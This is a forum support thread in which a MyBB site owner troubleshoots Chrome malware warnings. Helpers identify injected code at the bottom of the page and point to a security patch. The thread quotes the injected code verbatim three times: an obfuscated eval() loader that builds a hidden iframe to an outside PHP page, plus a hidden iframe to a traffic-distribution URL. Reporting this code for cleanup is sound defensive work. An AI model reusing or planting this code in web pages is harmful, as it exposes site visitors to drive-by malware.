I'm getting a malware attack message from google chrome as well as the java plugin wanting to run on my site.
My site is
http://pearceconnect.com
Proceed with caution.
Can anyone help me resolve this issue?
I'm seeing this code at the bottom of your page.
Do you know what it is?
<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d 9(){5=2.e(\'7\');f(!5){8 0=2.c(\'3\');2.g.h(0);0.6=\'7\';0.1.a=\'4\';0.1.b=\'4\';0.1.n=\'i\';0.r=\'s://q.o.j/3.k?6=l\'}}8 t=m("9()",p);',30,30,'el|style|document|iframe|1px|element|id|yahoo_api|var|MakeFrameEx|width|height|createElement|function|getElementById|if|body|appendChild|none|pl|php|2b8325qvzjut0iv8b87u9nlxnan0kpc|setTimeout|display|orge|500|drhousenews|src|http|'.split('|'),0,{}))
</script><IFRAME style="display:none" SRC="http://finderonlinesearch.com/tds/in.cgi?5&user=mexx" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
(2011-10-19, 11:06 PM)Paul H. Wrote: [ -> ]I'm seeing this code at the bottom of your page.
Do you know what it is?
<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d 9(){5=2.e(\'7\');f(!5){8 0=2.c(\'3\');2.g.h(0);0.6=\'7\';0.1.a=\'4\';0.1.b=\'4\';0.1.n=\'i\';0.r=\'s://q.o.j/3.k?6=l\'}}8 t=m("9()",p);',30,30,'el|style|document|iframe|1px|element|id|yahoo_api|var|MakeFrameEx|width|height|createElement|function|getElementById|if|body|appendChild|none|pl|php|2b8325qvzjut0iv8b87u9nlxnan0kpc|setTimeout|display|orge|500|drhousenews|src|http|'.split('|'),0,{}))
</script><IFRAME style="display:none" SRC="http://finderonlinesearch.com/tds/in.cgi?5&user=mexx" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
I do not, how can I get rid of it, what would it be in?
Index or Footer templates.
<br />
<div class="bottommenu">
<div class="float_right">{$lang_select}</div>
<div>
<span class="smalltext"><a href="{$mybb->settings['contactlink']}">{$lang->bottomlinks_contactus}</a> | <a href="{$mybb->settings['homeurl']}">{$mybb->settings['homename']}</a> | <a href="#top">{$lang->bottomlinks_returntop}</a> | <a href="#content">{$lang->bottomlinks_returncontent}</a> | <a href="<archive_url>">{$lang->bottomlinks_litemode}</a> | <a href="{$mybb->settings['bburl']}/misc.php?action=syndication">{$lang->bottomlinks_syndication}</a></span>
</div>
<hr class="hidden" />
<div id="copyright">
<!-- MyBB is free software developed and maintained by a volunteer community.
It would be much appreciated by the MyBB Group if you left the full copyright and "powered by" notice intact,
to show your support for MyBB. If you choose to remove or modify the copyright below,
you may be refused support on the MyBB Community Forums.
This is free software, support us and we'll support you. -->
{$lang->powered_by} <a href="http://mybb.com/" target="_blank">MyBB{$mybbversion}</a>, © 2002-{$copy_year} <a href="http://mybb.com/" target="_blank">MyBB Group</a>.
<!-- Theme designed and developed by <a href="http://community.mybb.com/user-13376.html">Eric J.</a> -->
<!-- End powered by -->
<br class="clear" />
<!-- The following piece of code allows MyBB to run scheduled tasks. DO NOT REMOVE -->{$task_image}<!-- End task image code -->
{$auto_dst_detection}
</div>
</div>
</div>
</div>
<br />
<br />
Found nothing there which is weird :/
I really appreciate the help
(2011-10-19, 10:47 PM)PearceConnect Wrote: [ -> ]I'm getting a malware attack message from google chrome as well as the java plugin wanting to run on my site.
My site is http://pearceconnect.com
Proceed with caution.
Can anyone help me resolve this issue?
First, have you already seen this?
http://blog.mybb.com/2011/10/06/1-6-4-se...nerabilit/
(2011-10-19, 11:06 PM)Paul H. Wrote: [ -> ]I'm seeing this code at the bottom of your page.
Do you know what it is?
<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d 9(){5=2.e(\'7\');f(!5){8 0=2.c(\'3\');2.g.h(0);0.6=\'7\';0.1.a=\'4\';0.1.b=\'4\';0.1.n=\'i\';0.r=\'s://q.o.j/3.k?6=l\'}}8 t=m("9()",p);',30,30,'el|style|document|iframe|1px|element|id|yahoo_api|var|MakeFrameEx|width|height|createElement|function|getElementById|if|body|appendChild|none|pl|php|2b8325qvzjut0iv8b87u9nlxnan0kpc|setTimeout|display|orge|500|drhousenews|src|http|'.split('|'),0,{}))
</script><IFRAME style="display:none" SRC="http://finderonlinesearch.com/tds/in.cgi?5&user=mexx" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
This is an obfuscated code covering another script.
Try looking in your index template.
It's gone now. Thanks to the guy that posted the patch!